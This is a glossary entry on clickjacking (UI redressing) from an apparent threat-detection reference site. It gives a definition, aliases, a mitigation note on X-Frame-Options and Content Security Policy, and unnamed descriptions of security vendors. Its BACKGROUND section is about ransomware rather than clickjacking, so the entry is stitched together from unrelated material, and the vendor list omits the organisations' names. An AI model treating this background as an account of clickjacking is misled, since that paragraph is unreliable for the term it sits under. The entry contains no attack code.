// THREAT DETECTION AND DATA PRIVACY TERM
Clickjacking
Clickjacking is an attack that tricks a user into clicking on something different from what they perceive. Attackers do this by hiding a webpage or button under a legitimate-looking one, causing the user's click to perform an unintended action on the hidden site.
TECHNICAL DEFINITION
Clickjacking, a type of UI redressing attack, is a web security vulnerability where an attacker uses transparent or opaque layers, often involving iframes and CSS, to trick a user into clicking a button or link on a different page than intended, thereby performing unauthorized actions within an authenticated user session.
BACKGROUND
Ransomware is a type of malware that encrypts the victim's personal data until a ransom is paid. Difficult-to-trace digital currencies such as paysafecard or Bitcoin and other cryptocurrencies are commonly used for the ransoms, making tracing and prosecuting the perpetrators difficult. Sometimes the original files can be retrieved without paying the ransom due to implementation mistakes, leaked cryptographic keys or a complete lack of encryption in the ransomware.
READ MORE ON WIKIPEDIASYNONYMS & ALIASES
- UI redressing
- UI redress attack
- likejacking
- iframe overlay
- transparent overlay attack
USAGE NOTE
This attack is primarily mitigated by web developers using security headers like X-Frame-Options or a Content Security Policy (CSP).
DEVELOPERS
Organizations developing technology related to Clickjacking.
Creator of Burp Suite, a leading web application security testing toolkit used by cybersecurity professionals to find and test for vulnerabilities, including susceptibility to clickjacking attacks.
A non-profit organization focused on improving software security. They develop open-source tools like the Zed Attack Proxy (ZAP) to find vulnerabilities and publish critical guidance, such as the Clickjacking Defense Cheat Sheet, for developers.
Provides a global network and security services, including a Web Application Firewall (WAF) that helps protect websites from clickjacking by automatically managing and enforcing security headers like Content-Security-Policy and X-Frame-Options.
A cybersecurity company specializing in Web Application Firewall (WAF) technology. Their solutions are designed to protect applications by detecting and blocking threats in real-time, including UI redressal attacks like clickjacking.
Develops a cloud-based security and compliance platform. Its Web Application Scanning (WAS) service automatically discovers and catalogs web applications and detects vulnerabilities, including misconfigurations that leave sites open to clickjacking.
A content delivery network (CDN) and cloud services provider that offers security solutions like the Kona Site Defender. This technology protects web applications at the network edge, mitigating attacks such as clickjacking before they reach the origin infrastructure.
Through the development of the Chrome browser and advocacy for web standards, Google builds and implements fundamental client-side protections against clickjacking, primarily through the enforcement of Content Security Policy (CSP).
Provides security analytics and automation. Their vulnerability scanner, Nexpose, and penetration testing tool, Metasploit, are used by security teams to identify and validate system weaknesses, including those related to clickjacking.